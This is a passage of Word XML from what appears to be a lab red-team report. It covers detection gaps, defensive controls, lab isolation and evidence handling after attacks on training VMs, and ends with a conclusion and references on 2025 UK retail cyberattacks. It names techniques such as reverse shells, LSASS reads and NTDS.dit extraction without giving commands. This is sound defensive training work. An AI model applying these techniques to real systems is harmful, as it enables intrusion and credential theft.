          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054B6697" wp14:editId="083832C9">
            <wp:extent cx="5943600" cy="1586230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="423930944" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60DB6F2-B1A3-42F1-AA36-7E2757D2A7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30944" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1586230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0997F" w14:textId="5B981BD4"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6 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D9D91" w14:textId="757077D1"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6.1 OWASPBWA Detection Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593AC7D" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>The web application server had no intrusion detection capabilities evident. SQL injections did not raise any security alerts, whereas command injection and reverse shell creation did not raise any security warnings. Absence of the deployment of web application firewall (WAF), input validation and security event logging were critical detection deficiencies [28].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1B53F" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve">Control Recommendations: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve"> WAF implementation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t>parameterised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:t xml:space="preserve"> database queries, full application logging (SIEM integration) and real time outbound network connection anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02740AB1" w14:textId="70A217F7" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="00F16CB9">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6.2 Metasploitable Monitoring Inadequacies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE492BE" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9"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Exploitation of legacy services was possible without the activation of defensive processes. The lack of network based intrusion detection system (NIDS) allowed reconnaissance, exploitation and establishment of persistence to occur without hindrance. There were no endpoint detection and response (EDR) features to detect suspicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unauthorised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSS key deployment [29].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88FA02" w14:textId="51DE779C" w:rsidR="00A000BA" w:rsidRPr="00A000BA"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Recommended Controls: segmentation of network and deployment of IDS/IPS, hardening of services with updates of version, monitoring endpoint solutions, and monitoring of file integrity of key directories in a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBF306" w14:textId="4E3A81D0"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6.3 Windows Server 2019 Security Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3DB25" w14:textId="77777777" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9"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Password spraying attacks were able to avoid account lockouts as a result of inadequate security policy settings. LSASS memory read and NTDS.dit dump extraction operations went through without any Windows Defender or event log analysis. Lack of credential guard, application whitelisting, and privileged access control allowed post-exploitation activities without any restrictions [30].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7227D0" w14:textId="30EAE1D9" w:rsidR="00A000BA" w:rsidRPr="00A000BA"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Suggested Controls: Advanced Threat Protection (ATP), credential guard, privileged access workstations (PAW), just-in-time (JIT) administration, LSASS protection and improved audit policy set up with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>centralised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> log analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4283F0" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E2F6D" w14:textId="5FBA00B5"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7 Operational Security and Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E52C6" w14:textId="7DBA1367"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7.1 Laboratory Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A382B" w14:textId="67200F0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isolation of the network was fully ensured by configuring the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment with disabled adapters to the external network. Pre-engagement VM snapshots provided the ability to quickly restore, and preservation of forensic evidence was done by fully recording and providing packet capture [31].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482992F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Verification Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF853FD"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Network adapter verification confirming host-only configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB0294"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External connectivity testing demonstrating complete isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335EB05F"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Snapshot validation ensuring rollback capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A106B9" w14:textId="5DC6A528"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7.2 Evidence Preservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EB17C" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The exploitation activities produced full forensic evidence, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CBBAE9" w14:textId="690F143E" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Packet captures (PCAP) for each step of exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE66D1" w14:textId="48A22C3B" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Command history logs of whole attack chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43192831" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Screen captures to prove successful compromises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680121E" w14:textId="1D578F17" w:rsidR="00A000BA" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Screenshots of credentials and databases (for report)</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF87CE" w14:textId="1F71C5ED"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8 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB10442" w14:textId="05B2120D" w:rsidR="00A000BA" w:rsidRDefault="00FB180E" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This red team exercise successfully demonstrated that entire ABCD Ltd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> infrastructure can be compromised through a series of web application vulnerabilities, legacy service vulnerabilities and Active Directory vulnerabilities. The attack chain successfully achieved the objectives of database exfiltration of database from OWASPBWA, persistence with elevated privileges on Metasploitable and domain administrator account credentials from Windows Server 2019. The detection gap analysis identifies the organisational exposure to risk as a result of unmonitored environment, lack of advanced security controls and lack of preparedness to counter threat actor techniques of the modern era. The timely implementation of remediation steps is organisational necessity to mitigate the discovered vulnerabilities and improve readiness to tackle advanced persistent threats.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07F325" w14:textId="46BF9B2E" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="00E76390">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sidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD6871" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] Irish Internet Security Forum, “Scattered spider and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> incident cyber technical guide,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.iisf.ie/files/UserFiles/Cyber-technical-guides/Scattered-Spider-and-MandS-Incident_.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C9F46" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Software, “M&amp;s ransomware attack: Active directory lessons,” Oct. 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://specopssoft.com/blog/marks-spencer-ransomware-active-directory/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599733BE" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] Marks &amp; Spencer, “Cyber incident: Further update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8EED8" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] Marks &amp; Spencer, “Cyber incident: Further update 0,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update-0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFA0BF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5] Information Commissioner’s Office, “Statement on cyber incidents impacting retailers,” May 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ico.org.uk/about-the-ico/media-centre/news-and-blogs/2025/05/statement-on-cyber-incidents-impacting-retailers/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552695C7" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] Marks &amp; Spencer, “Cyber update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/cyber-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CDDB1" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] National Crime Agency, “Retail </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> arrest four for attacks on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, co-op and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>harrods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1A671" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] Marks &amp; Spencer, “Annual report and financial statements 2025,” May 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://corporate.marksandspencer.com/sites/marksandspencer/files/2025-05/Marks-and-Spencer-Group-plc-Annual-Report-and-Financial-Statements-2025_INTERACTIVE_FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB2069" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] Co-operative Group, “Cyber incident update,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.co-operative.coop/media/news-releases/cyber-incident-update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD70A14" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[10] Co-operative Group, “Cyber incident information page,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.coop.co.uk/cyber-incident</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA6200" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[11] Co-operative Group, “Co-op’s underlying strength allows the group to navigate external pressures,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.co-operative.coop/media/news-releases/co-ops-underlying-strength-allows-the-group-to-navigate-external-pressures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E97CF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[12] BBC News, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> impact </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> retailers including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m&amp;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and co-op,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bbc.com/news/articles/cql0ple066po</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299292B4" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[13] Cybersecurity and Infrastructure Security Agency, “Avoiding social engineering and phishing attacks,” 2023. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712C733" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>[14] European Union Agency for Cybersecurity, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> threat landscape 2024,” 2024. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.enisa.europa.eu/publications/enisa-threat-landscape-2024</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. [Accessed: Apr. 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670D821" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[15] National Cyber Security Centre, “Statement on cyber incidents impacting retailers,” 2025. [Online]. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ncsc.gov.uk/news/retailers-incident</w:t>
        </w:r>
